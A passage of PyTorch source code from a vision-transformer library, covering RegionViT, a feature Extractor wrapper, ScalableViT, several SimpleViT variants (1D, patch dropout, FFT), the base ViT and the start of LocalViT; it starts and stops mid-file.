p2) d', p1 = window_size_h, p2 = window_size_w) region_tokens = rearrange(region_tokens, 'b n d -> (b n) () d') # do self attention on local tokens, along with its regional token region_and_local_tokens = torch.cat((region_tokens, local_tokens), dim = 1) region_and_local_tokens = attn(region_and_local_tokens, rel_pos_bias = rel_pos_bias) + region_and_local_tokens # feedforward region_and_local_tokens = ff(region_and_local_tokens) + region_and_local_tokens # split back local and regional tokens region_tokens, local_tokens = region_and_local_tokens[:, :1], region_and_local_tokens[:, 1:] local_tokens = rearrange(local_tokens, '(b h w) (p1 p2) d -> b (h p1 w p2) d', h = lh // window_size_h, w = lw // window_size_w, p1 = window_size_h) region_tokens = rearrange(region_tokens, '(b n) () d -> b n d', n = rh * rw) local_tokens = rearrange(local_tokens, 'b (h w) c -> b c h w', h 
= lh, w = lw) region_tokens = rearrange(region_tokens, 'b (h w) c -> b c h w', h = rh, w = rw) return local_tokens, region_tokens # classes class RegionViT(nn.Module): def __init__( self, *, dim = (64, 128, 256, 512), depth = (2, 2, 8, 2), window_size = 7, num_classes = 1000, tokenize_local_3_conv = False, local_patch_size = 4, use_peg = False, attn_dropout = 0., ff_dropout = 0., channels = 3, ): super().__init__() dim = cast_tuple(dim, 4) depth = cast_tuple(depth, 4) assert len(dim) == 4, 'dim needs to be a single value or a tuple of length 4' assert len(depth) == 4, 'depth needs to be a single value or a tuple of length 4' self.local_patch_size = local_patch_size region_patch_size = local_patch_size * window_size self.region_patch_size = local_patch_size * window_size init_dim, *_, last_dim = dim # local and region encoders if tokenize_local_3_conv: self.local_encoder = nn.Sequential( nn.Conv2d(3, init_dim, 3, 2, 1), nn.LayerNorm(init_dim), nn.GELU(), nn.Conv2d(init_dim, init_dim, 3, 2, 1), nn.LayerNorm(init_dim), nn.GELU(), nn.Conv2d(init_dim, init_dim, 3, 1, 1) ) else: self.local_encoder = nn.Conv2d(3, init_dim, 8, 4, 3) self.region_encoder = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (c p1 p2) h w', p1 = region_patch_size, p2 = region_patch_size), nn.Conv2d((region_patch_size ** 2) * channels, init_dim, 1) ) # layers current_dim = init_dim self.layers = nn.ModuleList([]) for ind, dim, num_layers in zip(range(4), dim, depth): not_first = ind != 0 need_downsample = not_first need_peg = not_first and use_peg self.layers.append(nn.ModuleList([ Downsample(current_dim, dim) if need_downsample else nn.Identity(), PEG(dim) if need_peg else nn.Identity(), R2LTransformer(dim, depth = num_layers, window_size = window_size, attn_dropout = attn_dropout, ff_dropout = ff_dropout) ])) current_dim = dim # final logits self.to_logits = nn.Sequential( Reduce('b c h w -> b c', 'mean'), nn.LayerNorm(last_dim), nn.Linear(last_dim, num_classes) ) def forward(self, x): *_, h, w = x.shape assert divisible_by(h, self.region_patch_size) and divisible_by(w, self.region_patch_size), 'height and width must be divisible by region patch size' assert divisible_by(h, self.local_patch_size) and divisible_by(w, self.local_patch_size), 'height and width must be divisible by local patch size' local_tokens = self.local_encoder(x) region_tokens = self.region_encoder(x) for down, peg, transformer in self.layers: local_tokens, region_tokens = down(local_tokens), down(region_tokens) local_tokens = peg(local_tokens) local_tokens, region_tokens = transformer(local_tokens, region_tokens) return self.to_logits(region_tokens) File: vit_pytorch/extractor.py import torch from torch import nn def exists(val): return val is not None def identity(t): return t def clone_and_detach(t): return t.clone().detach() def apply_tuple_or_single(fn, val): if isinstance(val, tuple): return tuple(map(fn, val)) return fn(val) class Extractor(nn.Module): def __init__( self, vit, device = None, layer = None, layer_name = 'transformer', layer_save_input = False, return_embeddings_only = False, detach = True ): super().__init__() self.vit = vit self.data = None self.latents = None self.hooks = [] self.hook_registered = False self.ejected = False self.device = device self.layer = layer self.layer_name = layer_name self.layer_save_input = layer_save_input # whether to save input or output of layer self.return_embeddings_only = return_embeddings_only self.detach_fn = clone_and_detach if detach else identity def _hook(self, _, inputs, output): 
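        # forward hook: stash the watched layer's output (or its input when
        # layer_save_input = True), cloning and detaching unless detach = False
        #
        # a minimal usage sketch for Extractor, assuming a ViT exposing a `transformer`
        # attribute; illustration only:
        #
        #   vit = Extractor(vit)
        #   preds, embeddings = vit(torch.randn(1, 3, 256, 256))
        #   vit = vit.eject()   # recover the unwrapped model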
layer_output = inputs if self.layer_save_input else output self.latents = apply_tuple_or_single(self.detach_fn, layer_output) def _register_hook(self): if not exists(self.layer): assert hasattr(self.vit, self.layer_name), 'layer whose output to take as embedding not found in vision transformer' layer = getattr(self.vit, self.layer_name) else: layer = self.layer handle = layer.register_forward_hook(self._hook) self.hooks.append(handle) self.hook_registered = True def eject(self): self.ejected = True for hook in self.hooks: hook.remove() self.hooks.clear() return self.vit def clear(self): del self.latents self.latents = None def forward( self, img, return_embeddings_only = False ): assert not self.ejected, 'extractor has been ejected, cannot be used anymore' self.clear() if not self.hook_registered: self._register_hook() pred = self.vit(img) target_device = self.device if exists(self.device) else img.device latents = apply_tuple_or_single(lambda t: t.to(target_device), self.latents) if return_embeddings_only or self.return_embeddings_only: return latents return pred, latents File: vit_pytorch/scalable_vit.py from functools import partial import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange, Reduce # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # helper classes class ChanLayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b class Downsample(nn.Module): def __init__(self, dim_in, dim_out): super().__init__() self.conv = nn.Conv2d(dim_in, dim_out, 3, stride = 2, padding = 1) def forward(self, x): return self.conv(x) class PEG(nn.Module): def __init__(self, dim, kernel_size = 3): super().__init__() self.proj = nn.Conv2d(dim, dim, kernel_size = kernel_size, padding = kernel_size // 2, groups = dim, stride = 1) def forward(self, x): return self.proj(x) + x # feedforward class FeedForward(nn.Module): def __init__(self, dim, expansion_factor = 4, dropout = 0.): super().__init__() inner_dim = dim * expansion_factor self.net = nn.Sequential( ChanLayerNorm(dim), nn.Conv2d(dim, inner_dim, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(inner_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) # attention class ScalableSelfAttention(nn.Module): def __init__( self, dim, heads = 8, dim_key = 32, dim_value = 32, dropout = 0., reduction_factor = 1 ): super().__init__() self.heads = heads self.scale = dim_key ** -0.5 self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.norm = ChanLayerNorm(dim) self.to_q = nn.Conv2d(dim, dim_key * heads, 1, bias = False) self.to_k = nn.Conv2d(dim, dim_key * heads, reduction_factor, stride = reduction_factor, bias = False) self.to_v = nn.Conv2d(dim, dim_value * heads, reduction_factor, stride = reduction_factor, bias = False) self.to_out = nn.Sequential( nn.Conv2d(dim_value * heads, dim, 1), nn.Dropout(dropout) ) def forward(self, x): height, width, heads = *x.shape[-2:], self.heads x = self.norm(x) q, k, v = self.to_q(x), self.to_k(x), 
self.to_v(x) # split out heads q, k, v = map(lambda t: rearrange(t, 'b (h d) ... -> b h (...) d', h = heads), (q, k, v)) # similarity dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale # attention attn = self.attend(dots) attn = self.dropout(attn) # aggregate values out = torch.matmul(attn, v) # merge back heads out = rearrange(out, 'b h (x y) d -> b (h d) x y', x = height, y = width) return self.to_out(out) class InteractiveWindowedSelfAttention(nn.Module): def __init__( self, dim, window_size, heads = 8, dim_key = 32, dim_value = 32, dropout = 0. ): super().__init__() self.heads = heads self.scale = dim_key ** -0.5 self.window_size = window_size self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.norm = ChanLayerNorm(dim) self.local_interactive_module = nn.Conv2d(dim_value * heads, dim_value * heads, 3, padding = 1) self.to_q = nn.Conv2d(dim, dim_key * heads, 1, bias = False) self.to_k = nn.Conv2d(dim, dim_key * heads, 1, bias = False) self.to_v = nn.Conv2d(dim, dim_value * heads, 1, bias = False) self.to_out = nn.Sequential( nn.Conv2d(dim_value * heads, dim, 1), nn.Dropout(dropout) ) def forward(self, x): height, width, heads, wsz = *x.shape[-2:], self.heads, self.window_size x = self.norm(x) wsz_h, wsz_w = default(wsz, height), default(wsz, width) assert (height % wsz_h) == 0 and (width % wsz_w) == 0, f'height ({height}) or width ({width}) of feature map is not divisible by the window size ({wsz_h}, {wsz_w})' q, k, v = self.to_q(x), self.to_k(x), self.to_v(x) # get output of LIM local_out = self.local_interactive_module(v) # divide into window (and split out heads) for efficient self attention q, k, v = map(lambda t: rearrange(t, 'b (h d) (x w1) (y w2) -> (b x y) h (w1 w2) d', h = heads, w1 = wsz_h, w2 = wsz_w), (q, k, v)) # similarity dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale # attention attn = self.attend(dots) attn = self.dropout(attn) # aggregate values out = torch.matmul(attn, v) # reshape the windows back to full feature map (and merge heads) out = rearrange(out, '(b x y) h (w1 w2) d -> b (h d) (x w1) (y w2)', x = height // wsz_h, y = width // wsz_w, w1 = wsz_h, w2 = wsz_w) # add LIM output out = out + local_out return self.to_out(out) class Transformer(nn.Module): def __init__( self, dim, depth, heads = 8, ff_expansion_factor = 4, dropout = 0., ssa_dim_key = 32, ssa_dim_value = 32, ssa_reduction_factor = 1, iwsa_dim_key = 32, iwsa_dim_value = 32, iwsa_window_size = None, norm_output = True ): super().__init__() self.layers = nn.ModuleList([]) for ind in range(depth): is_first = ind == 0 self.layers.append(nn.ModuleList([ ScalableSelfAttention(dim, heads = heads, dim_key = ssa_dim_key, dim_value = ssa_dim_value, reduction_factor = ssa_reduction_factor, dropout = dropout), FeedForward(dim, expansion_factor = ff_expansion_factor, dropout = dropout), PEG(dim) if is_first else None, FeedForward(dim, expansion_factor = ff_expansion_factor, dropout = dropout), InteractiveWindowedSelfAttention(dim, heads = heads, dim_key = iwsa_dim_key, dim_value = iwsa_dim_value, window_size = iwsa_window_size, dropout = dropout) ])) self.norm = ChanLayerNorm(dim) if norm_output else nn.Identity() def forward(self, x): for ssa, ff1, peg, iwsa, ff2 in self.layers: x = ssa(x) + x x = ff1(x) + x if exists(peg): x = peg(x) x = iwsa(x) + x x = ff2(x) + x return self.norm(x) class ScalableViT(nn.Module): def __init__( self, *, num_classes, dim, depth, heads, reduction_factor, window_size = None, iwsa_dim_key = 32, iwsa_dim_value = 32, ssa_dim_key = 32, 
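        # ssa_* parameters configure ScalableSelfAttention (keys/values spatially reduced by `reduction_factor`),
        # iwsa_* parameters configure InteractiveWindowedSelfAttention; scalar values are broadcast to every stage.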
ssa_dim_value = 32, ff_expansion_factor = 4, channels = 3, dropout = 0. ): super().__init__() self.to_patches = nn.Conv2d(channels, dim, 7, stride = 4, padding = 3) assert isinstance(depth, tuple), 'depth needs to be tuple if integers indicating number of transformer blocks at that stage' num_stages = len(depth) dims = tuple(map(lambda i: (2 ** i) * dim, range(num_stages))) hyperparams_per_stage = [ heads, ssa_dim_key, ssa_dim_value, reduction_factor, iwsa_dim_key, iwsa_dim_value, window_size, ] hyperparams_per_stage = list(map(partial(cast_tuple, length = num_stages), hyperparams_per_stage)) assert all(tuple(map(lambda arr: len(arr) == num_stages, hyperparams_per_stage))) self.layers = nn.ModuleList([]) for ind, (layer_dim, layer_depth, layer_heads, layer_ssa_dim_key, layer_ssa_dim_value, layer_ssa_reduction_factor, layer_iwsa_dim_key, layer_iwsa_dim_value, layer_window_size) in enumerate(zip(dims, depth, *hyperparams_per_stage)): is_last = ind == (num_stages - 1) self.layers.append(nn.ModuleList([ Transformer(dim = layer_dim, depth = layer_depth, heads = layer_heads, ff_expansion_factor = ff_expansion_factor, dropout = dropout, ssa_dim_key = layer_ssa_dim_key, ssa_dim_value = layer_ssa_dim_value, ssa_reduction_factor = layer_ssa_reduction_factor, iwsa_dim_key = layer_iwsa_dim_key, iwsa_dim_value = layer_iwsa_dim_value, iwsa_window_size = layer_window_size, norm_output = not is_last), Downsample(layer_dim, layer_dim * 2) if not is_last else None ])) self.mlp_head = nn.Sequential( Reduce('b d h w -> b d', 'mean'), nn.LayerNorm(dims[-1]), nn.Linear(dims[-1], num_classes) ) def forward(self, img): x = self.to_patches(img) for transformer, downsample in self.layers: x = transformer(x) if exists(downsample): x = downsample(x) return self.mlp_head(x) File: vit_pytorch/simple_vit_1d.py import torch from torch import nn from einops import rearrange from einops.layers.torch import Rearrange # helpers def posemb_sincos_1d(patches, temperature = 10000, dtype = torch.float32): _, n, dim, device, dtype = *patches.shape, patches.device, patches.dtype n = torch.arange(n, device = device) assert (dim % 2) == 0, 'feature dimension must be multiple of 2 for sincos emb' omega = torch.arange(dim // 2, device = device) / (dim // 2 - 1) omega = 1. 
/ (temperature ** omega) n = n.flatten()[:, None] * omega[None, :] pe = torch.cat((n.sin(), n.cos()), dim = 1) return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, seq_len, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64): super().__init__() assert seq_len % patch_size == 0 num_patches = seq_len // patch_size patch_dim = channels * patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (n p) -> b n (p c)', p = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, series): *_, n, dtype = *series.shape, series.dtype x = self.to_patch_embedding(series) pe = posemb_sincos_1d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) if __name__ == '__main__': v = SimpleViT( seq_len = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) time_series = torch.randn(4, 3, 256) logits = v(time_series) # (4, 1000) File: vit_pytorch/simple_vit_with_patch_dropout.py import torch from torch import nn from einops import rearrange from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(patches, temperature = 10000, dtype = torch.float32): _, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype y, x = torch.meshgrid(torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') assert (dim % 4) == 0, 'feature dimension must be multiple of 4 for sincos emb' omega = torch.arange(dim // 4, device = device) / (dim // 4 - 1) omega = 1. / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim = 1) return pe.type(dtype) # patch dropout class PatchDropout(nn.Module): def __init__(self, prob): super().__init__() assert 0 <= prob < 1. 
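        # `prob` is the fraction of patch tokens randomly dropped during training;
        # 0. disables patch dropout, and at least one patch is always kept (see forward below).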
self.prob = prob def forward(self, x): if not self.training or self.prob == 0.: return x b, n, _, device = *x.shape, x.device batch_indices = torch.arange(b, device = device) batch_indices = rearrange(batch_indices, '... -> ... 1') num_patches_keep = max(1, int(n * (1 - self.prob))) patch_indices_keep = torch.randn(b, n, device = device).topk(num_patches_keep, dim = -1).indices return x[batch_indices, patch_indices_keep] # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, patch_dropout = 0.5): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b h w (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.patch_dropout = PatchDropout(patch_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): *_, h, w, dtype = *img.shape, img.dtype x = self.to_patch_embedding(img) pe = posemb_sincos_2d(x) x = rearrange(x, 'b ... d -> b (...) 
d') + pe x = self.patch_dropout(x) x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/simple_vit_with_fft.py import torch from torch.fft import fft2 from torch import nn from einops import rearrange, reduce, pack, unpack from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert (dim % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = 1.0 / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, freq_patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) freq_patch_height, freq_patch_width = pair(freq_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' assert image_height % freq_patch_height == 0 and image_width % freq_patch_width == 0, 'Image dimensions must be divisible by the freq patch size.' 
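        # Two token streams are embedded: spatial patches of the image and patches of its 2D FFT.
        # The frequency branch has twice the channels because the fft2 output is viewed as real + imaginary parts.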
patch_dim = channels * patch_height * patch_width freq_patch_dim = channels * 2 * freq_patch_height * freq_patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.to_freq_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) ri -> b (h w) (p1 p2 ri c)", p1 = freq_patch_height, p2 = freq_patch_width), nn.LayerNorm(freq_patch_dim), nn.Linear(freq_patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim, ) self.freq_pos_embedding = posemb_sincos_2d( h = image_height // freq_patch_height, w = image_width // freq_patch_width, dim = dim ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): device, dtype = img.device, img.dtype x = self.to_patch_embedding(img) freqs = torch.view_as_real(fft2(img)) f = self.to_freq_embedding(freqs) x += self.pos_embedding.to(device, dtype = dtype) f += self.freq_pos_embedding.to(device, dtype = dtype) x, ps = pack((f, x), 'b * d') x = self.transformer(x) _, x = unpack(x, ps, 'b * d') x = reduce(x, 'b n d -> b d', 'mean') x = self.to_latent(x) return self.linear_head(x) if __name__ == '__main__': vit = SimpleViT( num_classes = 1000, image_size = 256, patch_size = 8, freq_patch_size = 8, dim = 1024, depth = 1, heads = 8, mlp_dim = 2048, ) images = torch.randn(8, 3, 256, 256) logits = vit(images) File: vit_pytorch/vit.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class ViT(nn.Module): def __init__(self, *, image_size, 
patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Linear(dim, num_classes) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/local_vit.py from math import sqrt import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # classes class Residual(nn.Module): def __init__(self, fn): super().__init__() self.fn = fn def forward(self, x, **kwargs): return self.fn(x, **kwargs) + x class ExcludeCLS(nn.Module): def __init__(self, fn): super().__init__() self.fn = fn def forward(self, x, **kwargs): cls_token, x = x[:, :1], x[:, 1:] x = self.fn(x, **kwargs) return torch.cat((cls_token, x), dim = 1) # feed forward related classes class DepthWiseConv2d(nn.Module): def __init__(self, dim_in, dim_out, kernel_size, padding, stride = 1, bias = True): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim_in, dim_in, kernel_size = kernel_size, padding = padding, groups = dim_in, stride = stride, bias = bias), nn.Conv2d(dim_in, dim_out, kernel_size = 1, bias = bias) ) def forward(self, x): return self.net(x) class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Conv2d(dim, hidden_dim, 1), nn.Hardswish(), DepthWiseConv2d(hidden_dim, hidden_dim, 3, padding = 1), nn.Hardswish(), nn.Dropout(dropout), nn.Conv2d(hidden_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): h = w = int(sqrt(x.shape[-2])) x = rearrange(x, 'b (h w) c -> b c h w', h = h, w = w) x = self.net(x) x = rearrange(x, 'b c h w -> b (h w) c') return x # attention class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): b, n, _, h = *x.shape, self.heads x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, 
v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Residual(Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout)), ExcludeCLS(Residual(FeedForward(dim, mlp_dim, dropout = dropout))) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) x = ff(x) return x # main class class LocalViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 